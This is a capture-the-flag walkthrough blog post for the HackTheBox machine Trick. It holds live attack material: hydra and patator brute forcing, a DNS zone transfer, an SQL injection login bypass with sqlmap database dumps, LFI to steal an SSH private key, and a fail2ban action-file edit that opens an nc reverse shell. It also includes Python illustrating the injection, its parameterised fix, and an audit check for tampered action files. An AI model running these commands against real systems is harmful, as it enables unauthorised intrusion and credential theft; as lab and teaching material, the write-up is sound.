HTB-Trick


IP: 10.10.11.166

nmap -Pn -sS -v -p- 10.10.11.166

Brute-forcing SSH on port 22 with hydra fails. (hydra reads the wordlist as plain text, so rockyou.txt.gz has to be gunzipped first; the command below uses the decompressed file.)

hydra 10.10.11.166 ssh -l root -P /usr/share/wordlists/rockyou.txt -t 6 -v -f

Port 80: browse the site and intercept the requests; nothing useful there.

Query DNS with dig: a zone transfer (AXFR) for trick.htb against the box's own nameserver succeeds and reveals preprod-payroll.trick.htb.

Reference: HackTricks, 53 - Pentesting DNS

dig axfr trick.htb @10.10.11.166

Fuzz for further subdomains by varying the Host header (-fw 1697 drops responses with the word count of the catch-all page):

ffuf -u http://trick.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: preprod-FUZZ.trick.htb' -fw 1697

This turns up preprod-marketing.trick.htb; add both preprod hosts to /etc/hosts.

preprod-payroll.trick.htb is nothing but a login form. Weak credentials fail, but a classic SQL injection authentication bypass gets into the admin panel:

username: admin' or True -- -
password: admin

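As an added illustration (my own code, not from the writeup), here is a small Python/sqlite3 model of why that username works. The table, names and passwords are constructed. The box itself runs MySQL (the current user comes back as remo@localhost below), where 'or True' and '-- -' behave the same way; the trailing '-' is there because MySQL only treats '--' as a comment when it is followed by whitespace. The TRUE keyword needs SQLite 3.23 or newer.

```python
import sqlite3

# Constructed stand-in for the payroll app's users table. Plaintext passwords
# are deliberate: the edit form on this box hands the stored password back to
# the browser, which only works if it is kept in the clear.
DEMO_USERS = [
    (1, "Site Admin", "admin", "demo-admin-password"),   # constructed values
    (2, "Staff User", "staff", "demo-staff-password"),
]


def demo_db():
    """In-memory SQLite database seeded with DEMO_USERS."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, name TEXT, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", DEMO_USERS)
    return con


def build_query(username, password):
    """The string concatenation a vulnerable PHP login does with $_POST values."""
    return ("SELECT id, name FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(username, password):
    """Runs the concatenated query: the quote in the username closes the string
    literal, 'or True' makes the WHERE clause true for every row, and '-- -'
    comments out the password check. The first row is the one 'logged in'."""
    return demo_db().execute(build_query(username, password)).fetchone()


def login_parameterised(username, password):
    """Same query with bound parameters: the quote stays data, not syntax."""
    sql = "SELECT id, name FROM users WHERE username = ? AND password = ?"
    return demo_db().execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    payload = "admin' or True -- -"
    print(build_query(payload, "admin"))
    print("vulnerable   :", login_vulnerable(payload, "admin"))
    print("parameterised:", login_parameterised(payload, "admin"))
```

The parameterised version returns nothing for the payload because the whole string, quote and all, is compared against the username column; that is the fix the payroll app is missing.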

Under Users → Action → Edit the form comes pre-filled with the user's stored password; inspecting the password field with the browser devtools (F12) shows it in the clear.

On the Employee page, add a member and capture the request:

POST /ajax.php?action=save_employee HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Origin: http://preprod-payroll.trick.htb
Connection: close
Referer: http://preprod-payroll.trick.htb/index.php?page=employee
Cookie: PHPSESSID=sge9952plnojhbr5qeobj5ggkv

id=&firstname=l1b3ri&middlename=l1b3ri&lastname=l1b3ri&department_id=2&position_id=2&salary=2

Save the request as employee_sql.req and point sqlmap at it (it tests every POST parameter by default):

sqlmap -r employee_sql.req --batch --hex --dbs

sqlmap -r employee_sql.req --batch --hex -D payroll_db --tables --threads 10


sqlmap -r employee_sql.req --batch --hex -D payroll_db -T users --columns --threads 10

sqlmap -r employee_sql.req --batch --hex -D payroll_db -T users -C name,id,password --dump --threads 10

sqlmap -r employee_sql.req --batch --hex --current-user --threads 10
current user: 'remo@localhost'

Also try reading files through the injection (this only works if the MySQL user, remo here, holds the FILE privilege and secure_file_priv does not block the path):

sqlmap -r employee_sql.req --batch --hex --file-read=/etc/hostname --threads 10

Meanwhile, the Users and Employee List pages are loaded through a ?page=xxx parameter, which smells like a file inclusion. Test it by intercepting the request and playing with the value.

Fuzz it. Note the session cookie has to be passed under the name PHP uses, PHPSESSID; -b cookie=... would send a cookie called "cookie" and the session would not be recognised:

wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_linux.txt -b PHPSESSID=sge9952plnojhbr5qeobj5ggkv "http://preprod-payroll.trick.htb/index.php?page=FUZZ"

No hits.

Try preprod-marketing.trick.htb instead. Its pages are loaded the same way:

http://preprod-marketing.trick.htb/index.php?page=about.html

Fuzz for LFI with the same list (no session cookie is needed on this host):

wfuzz -w /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_linux.txt "http://preprod-marketing.trick.htb/index.php?page=FUZZ"

Success: one of the traversal payloads in the list returns a file from outside the web root.


Use the LFI to read michael's SSH private key from his .ssh directory and save it locally as trick_michael.pri (chmod 600 before using it with ssh -i):

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

SSH in as michael with the key and run linpeas.

User flag:

280503ef44e47dc5d1f7c402eb65009f

Several of the usual privilege escalation paths fail.

Reference: Abusing Fail2ban misconfiguration to escalate privileges on Linux

/etc/fail2ban/action.d is writable by our user. The article's approach: copy iptables-multiport.conf, replace its actionban command, and put the modified file back. fail2ban runs as root and executes actionban every time it bans an IP, so the replacement command runs as root. Two things to keep in mind: fail2ban only reads action files when it starts, so the change takes effect after the service is restarted (check sudo -l for a permitted restart command, or wait for one), and the listener has to be up before the ban fires.

Copy iptables-multiport.conf out of action.d and open the copy in vim:

vim iptables-multiport.conf

Replace the actionban command (the iptables rule that would normally ban the offending IP) with a reverse shell. The box's nc accepts -e; with the OpenBSD netcat you would need a mkfifo-based shell instead:

/usr/bin/nc 10.10.16.23 1337 -e /usr/bin/bash

Move the modified file back into action.d and check the tail of the file to make sure the edit is in place:

mv iptables-multiport.conf /etc/fail2ban/action.d/
tail -n 20 /etc/fail2ban/action.d/iptables-multiport.conf

Start a listener on 10.10.16.23:1337, then trigger a ban with a burst of failed SSH logins (patator here; any brute-forcer will do):

patator ssh_login host=trick user=FILE0 password=FILE1 0=/usr/share/wordlists/SecLists/Usernames/Names/familynames-usa-top1000.txt 1=/usr/share/wordlists/SecLists/Passwords/500-worst-passwords.txt
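As an added example (my own code, not from the writeup or from fail2ban), the vim edit above done programmatically on a constructed approximation of the stock action file layout, with the defender's counterpart beside it: a scan of the action* keys for commands that do not start with a firewall token. The listener address is the writeup's; the file excerpt, the output handling and the allowed-prefix list are assumptions.

```python
import re
import sys

# Constructed excerpt approximating the [Definition] section of a stock
# iptables-multiport.conf (fail2ban 0.11 layout). A real file also carries
# comments and defaults under [Init].
STOCK_ACTION = """[INCLUDES]
before = iptables-common.conf

[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>

actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>

actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \\t]'

actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>

actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>

[Init]
"""

# Listener from the writeup; assumed, change to your own host:port.
PAYLOAD = "/usr/bin/nc 10.10.16.23 1337 -e /usr/bin/bash"

# Tokens a legitimate iptables-* action command is expected to start with.
ALLOWED_PREFIXES = ("<iptables>", "<actionflush>")


def get_action(text, key):
    """Value of one key (continuation lines joined), as fail2ban would read it."""
    m = re.search(r"^" + re.escape(key) + r"\s*=\s*(.*(?:\n[ \t]+.*)*)", text, re.M)
    if not m:
        raise KeyError(key)
    return " ".join(part.strip() for part in m.group(1).splitlines())


def set_action(text, key, command):
    """Replace one key inside [Definition], including any indented continuation
    lines of the old value, with a single-line command; keep everything else."""
    lines, out, i, in_def, done = text.splitlines(), [], 0, False, False
    while i < len(lines):
        line = lines[i]
        if line.startswith("["):
            in_def = line.strip() == "[Definition]"
        m = re.match(r"^(\w+)\s*=", line)
        if in_def and m and m.group(1) == key:
            out.append(key + " = " + command)
            i += 1
            while i < len(lines) and lines[i][:1] in (" ", "\t"):
                i += 1  # drop continuation lines of the old value
            done = True
            continue
        out.append(line)
        i += 1
    if not done:
        raise KeyError(key)
    return "\n".join(out) + "\n"


def audit_actions(text, allowed=ALLOWED_PREFIXES):
    """Defender-side check: action* keys in [Definition] whose command does not
    begin with an expected firewall token. Run it over the iptables-*.conf files
    in /etc/fail2ban/action.d to spot a planted command like PAYLOAD."""
    sec = re.search(r"^\[Definition\]\n(.*?)(?=^\[|\Z)", text, re.M | re.S)
    body = sec.group(1) if sec else ""
    return [m.group(1) for m in re.finditer(r"^(action\w*)\s*=\s*(.*)$", body, re.M)
            if not m.group(2).strip().startswith(allowed)]


if __name__ == "__main__":
    # Usage: python3 f2b_action.py [in.conf [out.conf]]; defaults to the sample.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else STOCK_ACTION
    patched = set_action(src, "actionban", PAYLOAD)
    if len(sys.argv) > 2:
        open(sys.argv[2], "w").write(patched)
    print("actionban now:", get_action(patched, "actionban"))
    print("audit flags  :", audit_actions(patched))
```

Run it with the real file as the first argument and an output path as the second to produce the file that gets moved back into action.d. On the defensive side, audit_actions over the iptables-*.conf files, together with a check that /etc/fail2ban/action.d and its files are not group- or world-writable, catches exactly this kind of tampering.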

The reverse shell connects back; fail2ban runs as root, so the shell is root.


Author: l1b3r
Copyright: unless otherwise stated, all posts on this blog are licensed under CC BY 4.0. Please credit l1b3r when reposting.